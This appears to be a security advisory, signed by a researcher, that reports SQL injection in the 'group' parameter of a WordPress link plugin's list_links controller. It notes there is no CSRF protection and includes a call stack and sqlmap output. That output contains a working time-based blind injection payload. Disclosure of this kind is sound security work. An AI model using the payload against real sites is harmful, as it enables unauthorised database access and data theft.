Authenticated administrators can execute arbitrary SQL commands (there is no CSRF protection).
1. SQL injection (PrliLinksController::list_links())
Method: GET
Vulnerable parameter: group
Example PHP callstack;
PrliLinksController::route [/pretty-link/classes/controllers/PrliLinksController.php:34]
PrliLinksController::list_links [/pretty-link/classes/controllers/PrliLinksController.php:65]
wpdb::get_var
Sqlmap verification:
...
Parameter: group (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: page=pretty-link&group=1 AND (SELECT * FROM (SELECT(SLEEP(5)))VFpT)
...
--
Regards,
Marcin Probola,